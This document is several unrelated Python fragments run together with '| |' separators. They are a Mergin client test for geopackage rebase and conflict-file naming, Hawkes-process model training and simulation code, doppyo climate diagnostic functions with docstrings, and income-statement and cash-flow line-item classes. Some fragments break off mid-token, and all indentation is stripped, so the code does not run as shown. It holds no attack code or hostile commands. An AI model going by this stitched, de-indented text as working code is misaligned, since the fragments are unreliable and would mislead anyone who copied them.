assert _get_table_row_count(test_gpkg_basefile, 'simple') == 3
assert _get_table_row_count(test_gpkg_conflict, 'simple') == 4
@pytest.mark.parametrize("extra_connection", [False, True])
def test_rebase_success(mc, extra_connection):
"""
Checks whether a pull with successful rebase is handled correctly.
i.e. changes are merged together and no conflict files are created.
"""
test_project = 'test_rebase_success'
if extra_connection:
test_project += '_extra_conn'
project = API_USER + '/' + test_project
project_dir = os.path.join(TMP_DIR, test_project) # primary project dir
project_dir_2 = os.path.join(TMP_DIR, test_project+'_2') # concurrent project dir
test_gpkg = os.path.join(project_dir, 'test.gpkg')
test_gpkg_2 = os.path.join(project_dir_2, 'test.gpkg')
test_gpkg_basefile = os.path.join(project_dir, '.mergin', 'test.gpkg')
test_gpkg_conflict = conflicted_copy_file_name(test_gpkg, API_USER, 1)
cleanup(mc, project, [project_dir, project_dir_2])
os.makedirs(project_dir)
shutil.copy(os.path.join(TEST_DATA_DIR, 'base.gpkg'), test_gpkg)
_use_wal(test_gpkg) # make sure we use WAL, that's the more common and more difficult scenario
mc.create_project_and_push(test_project, project_dir)
# Download project to the concurrent dir + add a row + push a new version
mc.download_project(project, project_dir_2)
shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_A.gpkg'), test_gpkg_2)
_use_wal(test_gpkg) # make sure we use WAL
mc.push_project(project_dir_2)
# do changes in the local DB (added a row)
shutil.copy(os.path.join(TEST_DATA_DIR, 'inserted_1_B.gpkg'), test_gpkg)
_use_wal(test_gpkg) # make sure we use WAL
if extra_connection:
# open a connection and keep it open (qgis does this with a pool of connections too)
con_extra = sqlite3.connect(test_gpkg)
cursor_extra = con_extra.cursor()
cursor_extra.execute('select count(*) from simple;')
pull_changes, push_changes, _ = mc.project_status(project_dir)
assert _is_file_updated('test.gpkg', pull_changes)
assert _is_file_updated('test.gpkg', push_changes)
assert not os.path.exists(test_gpkg_conflict)
mc.pull_project(project_dir)
assert not os.path.exists(test_gpkg_conflict)
# check that the local file + basefile don't contain the new row, and the conflict copy does
assert _get_table_row_count(test_gpkg, 'simple') == 5
assert _get_table_row_count(test_gpkg_basefile, 'simple') == 4
def test_conflict_file_names():
"""
Test generation of file names for conflicts files.
"""
data = [
('/home/test/geo.gpkg', 'jack', 10, '/home/test/geo (conflicted copy, jack v10).gpkg'),
('/home/test/g.pkg', 'j', 0, '/home/test/g (conflicted copy, j v0).pkg'),
('home/test/geo.gpkg', 'jack', 10, 'home/test/geo (conflicted copy, jack v10).gpkg'),
('geo.gpkg', 'jack', 10, 'geo (conflicted copy, jack v10).gpkg'),
('/home/../geo.gpkg', 'jack', 10, '/geo (conflicted copy, jack v10).gpkg'),
('/home/./geo.gpkg', 'jack', 10, '/home/geo (conflicted copy, jack v10).gpkg'),
('/home/test/geo.gpkg', '', 10, '/home/test/geo (conflicted copy, v10).gpkg'),
('/home/test/geo.gpkg', 'jack', -1, '/home/test/geo (conflicted copy, jack v-1).gpkg'),
('/home/test/geo.tar.gz', 'jack', 100, '/home/test/geo (conflicted copy, jack v100).tar.gz'),
('', 'jack', 1, '' )
]
for i in data:
file_name = conflicted_copy_file_name(i[0], i[1], i[2])
assert file_name == i[3]
data = [
('/home/test/geo.json', 'jack', 10, '/home/test/geo (edit conflict, jack v10).json'),
('/home/test/g.jsn', 'j', 0, '/home/test/g (edit conflict, j | |
"""
BSD 3-Clause License
Copyright (c) 2020, Cyber Security Research Centre Limited
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
from tick.hawkes import SimuHawkesExpKernels, SimuHawkesMulti, HawkesExpKern, SimuHawkes, HawkesEM, HawkesKernelTimeFunc, HawkesBasisKernels
from tick.plot import plot_hawkes_kernels, plot_point_process
import numpy as np
import matplotlib.pyplot as plt
from HelperFunctions import ConcatClusters, ComputeClusterLengths
from tick_goodness_of_fit import plot_resid, goodness_of_fit_par
from scipy import integrate
import math
#contains various functions used to train or simulate models related to hawkes processes
#some maybe broken, but the ones used in the notebooks work
#takes a list of inner cluster timestamps
#attemps to train an exp model to produce more clusters
def TrainInnerClusterExp(clusters, num_decays=2000, decay_low=-10, decay_high=10):
data = ConcatClusters(clusters, 0)
best_score = -1e100
#decays for multiple dimention process
#update this to have different decays for each process
#num_decays = 2000
#print(f"Total decay combinations = {num_decays*num_decays*num_decays*num_decays}")
decay_candidates = np.logspace(decay_low, decay_high, num_decays, dtype=np.dtype('d'))
print(f"Training on {len(clusters)} clusters")
print(f"Decay Range: {decay_candidates[0]} -> {decay_candidates[-1]}")
best_decay = decay_candidates[0]
score_list = np.zeros(num_decays)
#x*e^(-xt)
l = 0
floaterrors = 0
baseline_errors = 0
for i, decay in enumerate(decay_candidates):
decay = decay * np.ones((2,2))
try:
#might need a hyperbolic kernel?
#it seems to get too excited and decays too slowly
#only small decay values seem to make sense
learner = HawkesExpKern(decay, penalty='l2', C=1000, max_iter=1000, solver='agd', tol=1e-3)#, max_iter=1000, tol=1e-5) #gofit='likelihood'
###Error functions
#l1 - has 0 step errors
#l2 - runs, but the results do not look good, heavily favours higher decay values that produce nonsense graphs
#elasticnet (elastic_net_ratio, def 0.95) - values closer to 0 work better (since it uses l2) otherwise it produces step errors. Still similar to l2.
#nuclear - basically the same
#none - how can you have no penalty function?
###solvers
#agd - all penalties favour super high decays, basicaly wants random event generation
#gd - basically the same
#bfgs - does weird things, but is quick
#svrg
learner.fit(data, start=learner.coeffs)
"""cluster_num = 0
for cluster in clusters:
if (cluster_num % 100 == 0):
#print out training progress
s = f"It: {i}, Decay: {decay[0]}, Cluster: {cluster_num}"
print(f"\r{' '*l}\r", end='')
print(f"It: {i}, Decay: {decay[0]}, Cluster: {cluster_num}", end='', flush=True)
l = len(s)
learner.fit(cluster, start=learner.coeffs)
cluster_num += 1"""
hawkes_score = learner.score()
#print(hawkes_score)
#print(f"Coeffs: {learner.coeffs}")
#ensure there is a non-0 baseline
numb = 0
for b in learner.baseline:
if (b > 0):
numb += 1
if (numb == 0):
baseline_errors += 1
continue
#record the score for plotting
score_list[i] = hawkes_score
#record the best
if (hawkes_score > best_score):
best_score = hawkes_score
best_learner = learner
best_decay = decay
step = 0.01
#residuals = goodness_of_fit_par(learner,data,step,integrate.simps)
#plot_resid(residuals,2,1)
except ZeroDivisionError:
#print("float error");
floaterrors += 1
continue;
#create a score plot
plt.plot(decay_candidates, score_list)
plt.xscale('log')
plt.yscale('log')
plt.title('decay Scores')
plt.grid(True)
plt.show()
print(f"\nTraining Done")
print(f"Float Errors: {floaterrors} ({100/num_decays*floaterrors}%)")
print(f"Baseline Errors: {baseline_errors} ({100/num_decays*baseline_errors}%)")
print(f"==========\nSuccessful Results: {num_decays - floaterrors - baseline_errors} ({100/num_decays*(num_decays - floaterrors - baseline_errors)}%)\n==========\n")
print(f"\nBest Score: {best_score}")
print(f"Best Decay: {best_decay}")
plot_hawkes_kernels(best_learner)
print(f"Adjacency: {best_learner.adjacency}")
print(f"Baseline: {best_learner.baseline}")
print(f"Coeffs: {best_learner.coeffs}")
#return best_learner.adjacency, best_learner.baseline, best_decay
return best_learner, best_decay
def TrainSeriesExp(series, num_decays=2000, decay_low=-10, decay_high=10):
best_score = -1e100
#decays for multiple dimention process
#update this to have different decays for each process
#num_decays = 2000
#print(f"Total decay combinations = {num_decays*num_decays*num_decays*num_decays}")
decay_candidates = np.logspace(decay_low, decay_high, num_decays, dtype=np.dtype('d'))
print(f"Decay Range: {decay_candidates[0]} -> {decay_candidates[-1]}")
best_decay = decay_candidates[0]
score_list = np.zeros(num_decays)
#x*e^(-xt)
l = 0
floaterrors = 0
baseline_errors = 0
for i, decay in enumerate(decay_candidates):
#decay = decay * np.ones((2,2))
try:
#might need a hyperbolic kernel?
#it seems to get too excited and decays too slowly
#only small decay values seem to make sense
learner = HawkesExpKern(decay, penalty='l2', C=1e-3, max_iter=1000, solver='agd', tol=1e-5)#, max_iter=1000, tol=1e-5) #gofit='likelihood'
###Error functions
#l1 - has 0 step errors
#l2 - runs, but the results do not look good, heavily favours higher decay values that produce nonsence graphs
#elasticnet (elastic_net_ratio, def 0.95) - values closer to 0 work better (since it uses l2) otherwise it produces step errors. Still similar to l2.
#nuclear - basically the same
#none - how can you have no penalty function?
###solvers
#agd - all penalties favour super high decays, basicaly wants random event generation
#gd - basically the same
#bfgs - does weird things, but is quick
#svrg
learner.fit([series])
"""cluster_num = 0
for cluster in clusters:
if (cluster_num % 100 == 0):
#print out training progress
s = f"It: {i}, Decay: {decay[0]}, Cluster: {cluster_num}"
print(f"\r{' '*l}\r", end='')
print(f"It: {i}, Decay: {decay[0]}, Cluster: {cluster_num}", end='', flush=True)
l = len(s)
learner.fit(cluster, start=learner.coeffs)
cluster_num += 1"""
hawkes_score = learner.score()
#print(hawkes_score)
#print(f"Coeffs: {learner.coeffs}")
#ensure there is a non-0 baseline
numb = 0
for b in learner.baseline:
if (b > 0):
numb += 1
if (numb == 0):
baseline_errors += 1
continue
#record the score for plotting
score_list[i] = hawkes_score
#record the best
if (hawkes_score > best_score):
best_score = hawkes_score
best_learner = learner
best_decay = decay
except ZeroDivisionError:
#print("float error");
floaterrors += 1
continue;
#create a score plot
plt.plot(decay_candidates, score_list)
plt.xscale('log')
plt.yscale('log')
plt.title('decay Scores')
plt.grid(True)
plt.show()
print(f"\nTraining Done")
print(f"Float Errors: {floaterrors} ({100/num_decays*floaterrors}%)")
print(f"Baseline Errors: {baseline_errors} ({100/num_decays*baseline_errors}%)")
print(f"==========\nSuccessful Results: {num_decays - floaterrors - baseline_errors} ({100/num_decays*(num_decays - floaterrors - baseline_errors)}%)\n==========\n")
print(f"\nBest Score: {best_score}")
print(f"Best Decay: {best_decay}")
plot_hawkes_kernels(best_learner)
print(f"Adjacency: {best_learner.adjacency}")
print(f"Baseline: {best_learner.baseline}")
print(f"Coeffs: {best_learner.coeffs}")
#return best_learner.adjacency, best_learner.baseline, best_decay
return best_learner, best_decay
#careful, setting the time to be too high will eat up all available memory
def SimulateExp(baseline, adjacency, decays, time):
hawkes = SimuHawkesExpKernels(adjacency=adjacency, decays=decays, baseline=baseline, verbose=False)
hawkes.end_time = time
dt = 0.001 #millisecond granularity
#hawkes.track_intensity(dt)
print(f"Starting sim")
hawkes.simulate()
timestamps = hawkes.timestamps
l = 0
for series in timestamps:
l += len(series)
print(f"Simulated {l} points")
return hawkes.timestamps
def TrainInnerClusterEM(clusters, k_time = 1, k_size = 100):
#merge all the clusters, the learner seems to only be able to fit a single long datastream
num_clusters = len(clusters)
data = ConcatClusters(clusters, 0)
#kernel size is the granularity
#kernel support is something... (is it the size of each step?)
em_learner = HawkesEM(kernel_support=k_time, kernel_size=k_size, n_threads=8, verbose=True, tol=1e-5, max_iter=1000)
em_learner.fit(data)
"""#train the em learner on each cluster
cluster_num = 0
for cluster in clusters:
if (cluster_num % 10 == 0):
#print out training progress
s = f"Cluster: {cluster_num}/{num_clusters}"
print(f"\r{' '*l}\r", end='')
print(f"Cluster: {cluster_num}/{num_clusters}", end='', flush=True)
l = len(s)
print(em_learner.baseline)
print(em_learner.kernel)
print("==========")
if (cluster_num == 0):
em_learner.fit(cluster)
else:
em_learner.fit(cluster, baseline_start=em_learner.baseline, kernel_start=em_learner.kernel)
cluster_num += 1"""
#maybe add variation in kernel sie later?
#use em_learner.score() to evaluate goodness
print(f"\nEM Score: {em_learner.score()}")
fig = plot_hawkes_kernels(em_learner) #TODO, remove this?
t = np.linspace(0, k_time, endpoint=False, num=k_size)
m = []
for i in range(2):
for j in range(2):
m.append(max(em_learner.kernel[i][j]))
#normalise to make a proper hawkes process
spectral_radius = max(m)
if (spectral_radius < 1):
spectral_radius = 1
#create a 2x2 array of time func kernels
k = [[],[]]
for i in range(2):
for j in range(2):
k[i].append(HawkesKernelTimeFunc(t_values=t, y_values=em_learner.kernel[i][j]/np.linalg.norm(em_learner.kernel[i][j])))
#return k, em_learner.baseline #the kernel, baseline
return em_learner
def SimulateEM(kernel, baseline, time=600):
sim_em = SimuHawkes(kernels=kernel, baseline=baseline, verbose=False, end_time=time)
dt = 0.001 #millisecond | |
Examples
--------
>>> gh = xr.DataArray(np.random.normal(size=(3,4,4)),
... coords=[('level', [400, 500, 600]), ('lat', np.arange(-90,90,45)),
... ('lon', np.arange(0,360,90))])
>>> doppyo.diagnostic.thermal_wind(gh, plevel_lower=400, plevel_upper=600)
<xarray.Dataset>
Dimensions: (lat: 4, lon: 4)
Coordinates:
level float64 500.0
* lon (lon) int64 0 90 180 270
* lat (lat) int64 -90 -45 0 45
Data variables:
u_tw (lon, lat) float64 0.003727 0.0006837 inf ... inf -0.0001238
v_tw (lat, lon) float64 4.515e+12 -1.443e+12 ... -0.000569 -0.0002777
Limitations
-----------
All input array coordinates must follow standard naming (see doppyo.utils.get_lat_name(),
doppyo.utils.get_lon_name(), etc)
Pressure levels must be provided in units of hPa
"""
degtorad = utils.constants().pi / 180
if lat_name is None:
lat_name = utils.get_lat_name(gh)
if lon_name is None:
lon_name = utils.get_lon_name(gh)
if plevel_name is None:
plevel_name = utils.get_plevel_name(gh)
# Compute the thickness -----
upper = gh.sel({plevel_name : plevel_lower})
upper[plevel_name] = (plevel_lower + plevel_upper) / 2
lower = gh.sel({plevel_name : plevel_upper})
lower[plevel_name] = (plevel_lower + plevel_upper) / 2
thickness = upper - lower
# Compute the gradient -----
x, y = utils.xy_from_lonlat(gh[lon_name], gh[lat_name])
u_tmp = utils.differentiate_wrt(thickness, dim=lon_name, x=x)
v_tmp = utils.differentiate_wrt(thickness, dim=lat_name, x=y)
# Or use windspharm -----
# w = wsh.xarray.VectorWind(thickness, thickness)
# u_tmp, v_tmp = w.gradient(thickness)
# k x (u_tw,v_tw) -> (-v_tw, u_tw) -----
u_tw = -v_tmp / (2 * utils.constants().Omega * xr.ufuncs.sin(thickness[lat_name] * degtorad))
v_tw = u_tmp / (2 * utils.constants().Omega * xr.ufuncs.sin(thickness[lat_name] * degtorad))
# Combine into dataset -----
tw = u_tw.to_dataset(name='u_tw')
tw['v_tw'] = v_tw
return tw
# ===================================================================================================
def eofs(da, sample_dim='time', weight=None, n_modes=20):
"""
Returns the empirical orthogonal functions (EOFs), and associated principle component
timeseries (PCs), and explained variances of provided array. Follows notation used in
"<NAME>. and <NAME>. 1997 A Manual for EOF and SVD analyses of Climatic Data",
whereby,
(phi, sqrt_lambdas, EOFs) = svd(data) and PCs = phi * sqrt_lambdas
Author: <NAME>
Date: 19/18/2018
Parameters
----------
da : xarray DataArray or sequence of xarray DataArrays
Array to use to compute EOFs. When input array is a list of xarray objects, returns the
joint EOFs associated with each object. In this case, all xarray objects in da must have
sample_dim dimensions of equal length.
sample_dim : str, optional
EOFs sample dimension
weight : xarray DataArray or sequence of xarray DataArrays, optional
Weighting to apply prior to svd. If weight=None, cos(lat)^2 weighting are used. If weight
is specified, it must be the same length as da with each element broadcastable onto each
element of da
n_modes : values, optional
Number of EOF modes to return
Returns
-------
eofs : xarray Dataset
Dataset containing the following variables:
EOFs; array containing the empirical orthogonal functions
PCs; array containing the associated principle component timeseries
lambdas; array containing the eigenvalues of the covariance of the input data
explained_var; array containing the fraction of the total variance explained by each EOF
mode
Examples
--------
>>> A = xr.DataArray(np.random.normal(size=(6,4,40)),
... coords=[('lat', np.arange(-75,76,30)), ('lon', np.arange(45,316,90)),
... ('time', pd.date_range('2000-01-01', periods=40, freq='M'))])
>>> doppyo.diagnostic.eofs(A)
<xarray.Dataset>
Dimensions: (lat: 6, lon: 4, mode: 20, time: 40)
Coordinates:
* time (time) datetime64[ns] 2000-01-31 2000-02-29 ... 2003-04-30
* mode (mode) int64 1 2 3 4 5 6 7 8 9 ... 12 13 14 15 16 17 18 19 20
* lat (lat) int64 -75 -45 -15 15 45 75
* lon (lon) int64 45 135 225 315
Data variables:
EOFs (mode, lat, lon) float64 -0.05723 -0.01997 ... 0.08166
PCs (time, mode) float64 1.183 -1.107 -0.5385 ... -0.08552 0.1951
lambdas (mode) float64 87.76 80.37 68.5 58.14 ... 8.269 6.279 4.74
explained_var (mode) float64 0.1348 0.1234 0.1052 ... 0.009644 0.00728
Limitations
-----------
This function is a wrapper on scipy.sparse.linalg.svds which is a naive implementation
using ARPACK. Thus, the approach implemented here is non-lazy and could incur large
increases in memory usage.
"""
if isinstance(da, xr.core.dataarray.DataArray):
da = [da]
if isinstance(weight, xr.core.dataarray.DataArray):
weight = [weight]
# Apply weights -----
if weight is None:
degtorad = utils.constants().pi / 180
weight = [xr.ufuncs.cos(da[idx][utils.get_lat_name(da[idx])] * degtorad) ** 0.5
for idx in range(len(da))]
if len(weight) != len(da):
raise ValueError('da and weight must be of equal length')
da = [weight[idx].fillna(0) * da[idx] for idx in range(len(da))]
# Stack along everything but the sample dimension -----
sensor_dims = [utils.get_other_dims(d, sample_dim) for d in da]
da = [d.stack(sensor_dim=sensor_dims[idx])
.transpose(*[sample_dim, 'sensor_dim']) for idx, d in enumerate(da)]
sensor_segs = np.cumsum([0] + [len(d.sensor_dim) for d in da])
# Load and concatenate each object in da -----
try:
data = np.concatenate(da, axis=1)
except ValueError:
raise ValueError('sample_dim must be equal length for all data in da')
# First dimension must be sample dimension -----
phi, sqrt_lambdas, eofs = linalg.svds(data, k=n_modes)
pcs = phi * sqrt_lambdas
lambdas = sqrt_lambdas ** 2
# n_modes largest modes are ordered from smallest to largest -----
pcs = np.flip(pcs, axis=1)
lambdas = np.flip(lambdas, axis=0)
eofs = np.flip(eofs, axis=0)
# Compute the sum of the lambdas -----
sum_of_lambdas = np.trace(np.dot(data,data.T))
# Restructure back into xarray object -----
dims_eof = ['mode', 'sensor_dim']
dims_pc = [sample_dim, 'mode']
dims_lambda = ['mode']
EOF = []
for idx in range(len(sensor_segs)-1):
data_vars = {'EOFs' : (tuple(dims_eof), eofs[:, sensor_segs[idx]:sensor_segs[idx+1]]),
'PCs' : (tuple(dims_pc), pcs),
'lambdas' : (tuple(dims_lambda), lambdas),
'explained_var' : (tuple(dims_lambda), lambdas / sum_of_lambdas)}
coords = dict(da[idx].coords.items())
coords['mode'] = np.arange(1, n_modes+1)
EOF.append(xr.Dataset(data_vars,coords).unstack('sensor_dim'))
if len(EOF) == 1:
return EOF[0]
else:
return EOF
# ===================================================================================================
def mean_merid_mass_streamfunction(v, lat_name=None, lon_name=None, plevel_name=None):
"""
Returns the mean meridional mass stream function averaged over all provided longitudes
Author: <NAME>
Date: 15/07/2018
Parameters
----------
v : xarray DataArray
Array containing fields of meridional velocity with at least coordinates latitude, longitude
and level (following standard naming - see Limitations)
lat_name : str, optional
Name of latitude coordinate. If None, doppyo will attempt to determine lat_name
automatically
lon_name : str, optional
Name of longitude coordinate. If None, doppyo will attempt to determine lon_name
automatically
plevel_name : str, optional
Name of pressure level coordinate. If None, doppyo will attempt to determine plevel_name
automatically
Returns
-------
mmms : xarray DataArray
New DataArray object containing the mean meridional mass stream function
Examples
--------
>>> v = xr.DataArray(np.random.normal(size=(2,4,4)),
... coords=[('level', [400, 600]), ('lat', np.arange(-90,90,45)),
... ('lon', np.arange(0,360,90))])
>>> doppyo.diagnostic.mean_merid_mass_streamfunction(v)
<xarray.DataArray 'mmms' (lat: 4, level: 2)>
array([[ 0.000000e+00, -1.336316e-07],
[ 0.000000e+00, -1.447547e+10],
[ 0.000000e+00, -3.208457e+09],
[ 0.000000e+00, -2.562681e+10]])
Coordinates:
* lat (lat) int64 -90 -45 0 45
* level (level) int64 400 600
Limitations
-----------
All input array coordinates must follow standard naming (see doppyo.utils.get_lat_name(),
doppyo.utils.get_lon_name(), etc)
Pressure levels must be provided in units of hPa
"""
degtorad = utils.constants().pi / 180
if lat_name is None:
lat_name = utils.get_lat_name(v)
if lon_name is None:
lon_name = utils.get_lon_name(v)
if plevel_name is None:
plevel_name = utils.get_plevel_name(v)
cos_lat = xr.ufuncs.cos(v[lat_name] * degtorad)
v_Z = v.mean(dim=lon_name)
return (2 * utils.constants().pi * utils.constants().R_earth * cos_lat * \
utils.integrate(v_Z, over_dim=plevel_name, x=(v_Z[plevel_name] * 100), cumulative=True) \
/ utils.constants().g).rename('mmms')
# ===================================================================================================
def atmos_energy_cycle(temp, u, v, omega, gh, terms=None, vgradz=False, spectral=False, n_wavenumbers=20,
integrate=True, lat_name=None, lon_name=None, plevel_name=None):
"""
Returns all terms in the Lorenz energy cycle. Follows formulae and notation used in `Marques
et al. 2011 Global diagnostic energetics of five state-of-the-art climate models. Climate
Dynamics`. Note that this decomposition is in the space domain. A space-time decomposition
can also be carried out (though not in Fourier space, but this is not implemented here (see
`Oort. 1964 On Estimates of the atmospheric energy cycle. Monthly Weather Review`).
Author: <NAME>
Date: 15/07/2018
Parameters
----------
temp : xarray DataArray
Array containing fields of temperature with at least coordinates latitude, longitude
and level (following standard naming - see Limitations)
u : xarray DataArray
Array containing fields of zonal velocity with at least coordinates latitude, longitude
and level (following standard naming - see Limitations)
v : xarray DataArray
| |
from base_classes import *
class income_statement(financial_statement):
''' __init__ will create the necessary accounts for an income statement.
--------------------------------------------------------------------------
No data must be added initially, use function add_data for this '''
def __init__(self, data=None):
####################################
## Final Line Of Income Statement ##
####################################
self.is_tid_58 = line_item('Net Income Available to Common Shareholders', 57)
####################################
## Net Income & Final Adjustments ##
####################################
self.is_tid_55 = line_item('Net Income',
54,
parent=self.is_tid_58)
self.is_tid_56 = line_item('Preferred Dividends',
55,
parent=self.is_tid_58)
self.is_tid_57 = line_item('Other Adjustments',
56,
parent=self.is_tid_58)
####################################
## Factoring In Minority Interest ##
####################################
self.is_tid_53 = line_item('Income (Loss) Including Minority Interest',
52,
parent=self.is_tid_55)
self.is_tid_54 = line_item('Minority Interest',
53,
parent=self.is_tid_55)
#########################
## Extraordinary Items ##
#########################
self.is_tid_50 = line_item('Net Extraordinary Gains (Losses)',
49,
parent=self.is_tid_53)
self.is_tid_51 = line_item(' Discontinued Operations',
50,
parent=self.is_tid_50)
self.is_tid_52 = line_item(' XO & Accounting Charges & Other',
51,
parent=self.is_tid_50)
########################
## Income After Taxes ##
########################
self.is_tid_49 = line_item('Income (Loss) from Continuing Operations',
48,
parent=self.is_tid_53)
self.is_tid_48 = line_item('Income (Loss) from Affiliates, net of taxes',
47,
parent=self.is_tid_49)
####################
## Pre-Tax Income ##
####################
self.is_tid_43 = line_item('Pretax Income (Loss)',
42,
parent=self.is_tid_49)
self.is_tid_28 = line_item('Pretax Income (Loss), Adjusted',
27,
parent=self.is_tid_43)
#################
## Tax Expense ##
#################
self.is_tid_44 = line_item('Income Tax (Expense) Benefit, net',
43,
parent=self.is_tid_49)
self.is_tid_45 = line_item(' Current Income Tax',
44,
parent=self.is_tid_44)
self.is_tid_46 = line_item(' Deferred Income Tax',
45,
parent=self.is_tid_44)
self.is_tid_47 = line_item(' Tax Allowance/Credit',
46,
parent=self.is_tid_44)
####################################
## Abnormal Activities & Children ##
####################################
self.is_tid_29 = line_item('Abnormal Gains (Losses)',
28,
parent=self.is_tid_43)
self.is_tid_30 = line_item(' Acquired In-Process R&D',
29,
parent=self.is_tid_29)
self.is_tid_31 = line_item(' Merger / Acquisition Expense',
30,
parent=self.is_tid_29)
self.is_tid_32 = line_item(' Abnormal Derivatives',
31,
parent=self.is_tid_29)
self.is_tid_33 = line_item(' Disposal of Assets',
32,
parent=self.is_tid_29)
self.is_tid_34 = line_item(' Early extinguishment of Debt',
33,
parent=self.is_tid_29)
self.is_tid_35 = line_item(' Asset Write-Down',
34,
parent=self.is_tid_29)
self.is_tid_36 = line_item(' Impairment of Goodwill & Intangibles',
35,
parent=self.is_tid_29)
self.is_tid_37 = line_item(' Sale of Business',
36,
parent=self.is_tid_29)
self.is_tid_38 = line_item(' Legal Settlement',
37,
parent=self.is_tid_29)
self.is_tid_39 = line_item(' Restructuring Charges',
38,
parent=self.is_tid_29)
self.is_tid_40 = line_item(' Sale of and Unrealized Investments',
39,
parent=self.is_tid_29)
self.is_tid_41 = line_item(' Insurance Settlement',
40,
parent=self.is_tid_29)
self.is_tid_42 = line_item(' Other Abnormal Items',
41,
parent=self.is_tid_29)
##############################
## Non-Operating Activities ##
##############################
self.is_tid_20 = line_item('Non-Operating Income (Loss)',
19,
parent=self.is_tid_28)
self.is_tid_21 = line_item(' Interest Expense, net',
20,
parent=self.is_tid_20)
self.is_tid_22 = line_item(' Interest Expense',
21,
parent=self.is_tid_21)
self.is_tid_23 = line_item(' Interest Income',
22,
parent=self.is_tid_21)
self.is_tid_24 = line_item(' Other Investment Income (Loss)',
23,
parent=self.is_tid_20)
self.is_tid_25 = line_item(' Foreign Exchange Gain (Loss)',
24,
parent=self.is_tid_20)
self.is_tid_26 = line_item(' Income (Loss) from Affiliates',
25,
parent=self.is_tid_20)
self.is_tid_27 = line_item(' Other Non-Operating Income (Loss)',
26,
parent=self.is_tid_20)
######################
## Operating Income ##
######################
self.is_tid_19 = line_item('Operating Income (Loss)',
18,
parent=self.is_tid_28)
self.is_tid_10 = line_item(' Other Operating Income',
9,
parent=self.is_tid_19)
###################################
## Operating Expenses & Children ##
###################################
self.is_tid_11 = line_item('Operating Expenses',
10,
parent=self.is_tid_19)
self.is_tid_12 = line_item(' Selling, General & Administrative',
11,
parent=self.is_tid_11)
self.is_tid_13 = line_item(' Selling & Marketing',
12,
parent=self.is_tid_12)
self.is_tid_14 = line_item(' General & Administrative',
13,
parent=self.is_tid_12)
self.is_tid_15 = line_item(' Research & Development',
14,
parent=self.is_tid_11)
self.is_tid_16 = line_item(' Depreciation & Amortization',
15,
parent=self.is_tid_11)
self.is_tid_17 = line_item(' Provision For Doubtful Accounts',
16,
parent=self.is_tid_11)
self.is_tid_18 = line_item(' Other Operating Expense',
17,
parent=self.is_tid_11)
##################
## Gross Profit ##
##################
self.is_tid_4 = line_item('Gross Profit',
8,
parent=self.is_tid_19)
##############################
## Cost of Sales & Children ##
##############################
self.is_tid_2 = line_item('Cost of revenue',
4,
parent=self.is_tid_4)
self.is_tid_7 = line_item(' Cost of Goods & Services',
5,
parent=self.is_tid_2)
self.is_tid_8 = line_item(' Cost of Financing Revenue',
6,
parent=self.is_tid_2)
self.is_tid_9 = line_item(' Cost of Other Revenue',
7,
parent=self.is_tid_2)
########################
## Revenue & Children ##
########################
self.is_tid_1 = line_item('Revenue',
0,
parent=self.is_tid_4)
self.is_tid_3 = line_item(' Sales & Services Revenue',
1,
parent=self.is_tid_1)
self.is_tid_5 = line_item(' Financing Revenue',
2,
parent=self.is_tid_1)
self.is_tid_6 = line_item(' Other Revenue',
3,
parent=self.is_tid_1)
if data:
self.add_data(data)
class cash_flow_statement(financial_statement):
''' __init__ will create the necessary accounts for a cash flow statement.
--------------------------------------------------------------------------
No data must be added initially, use function add_data for this '''
def __init__(self, data=None):
#######################################
## Final Line Of Cash Flow Statement ##
#######################################
self.cf_tid_46 = line_item('Net Changes in Cash', 51)
######################################
## Factoring In FX Gains and Losses ##
######################################
self.cf_tid_44 = line_item(' Effect of Foreign Exchange Rates',
50,
parent=self.cf_tid_46)
self.cf_tid_55 = line_item('Net Cash Before FX',
49,
parent=self.cf_tid_46)
##########################################
## Factoring in Discontinued Operations ##
##########################################
self.cf_tid_56 = line_item('Net Cash Before Disc. Operations and FX',
47,
parent=self.cf_tid_55)
self.cf_tid_45 = line_item(' Change in Cash from Disc. Operations and Other',
48,
parent=self.cf_tid_55)
####################################
## Cash From Operating Activities ##
####################################
self.cf_tid_13 = line_item('Cash from Operating Activities',
15,
parent=self.cf_tid_56)
###########################
## Net Income & Children ##
###########################
self.cf_tid_1 = line_item('Net Income/Starting Line',
0,
parent=self.cf_tid_13)
self.cf_tid_47 = line_item(' Net Income',
1,
parent=self.cf_tid_1)
self.cf_tid_48 = line_item(' Net Income From Discontinued Operations',
2,
parent=self.cf_tid_1)
self.cf_tid_49 = line_item(' Other Adjustments',
3,
parent=self.cf_tid_1)
###############################
## Non-Cash Items & Children ##
###############################
self.cf_tid_3 = line_item('Non-Cash Items',
5,
parent=self.cf_tid_13)
self.cf_tid_4 = line_item(' Stock-Based Compensation',
6,
parent=self.cf_tid_3)
self.cf_tid_5 = line_item(' Deferred Income Taxes',
7,
parent=self.cf_tid_3)
self.cf_tid_6 = line_item(' Other Non-Cash Adjustments',
8,
parent=self.cf_tid_3)
##########################################
## Change in Working Capital & Children ##
##########################################
self.cf_tid_7 = line_item('Change in Working Capital',
9,
parent=self.cf_tid_13)
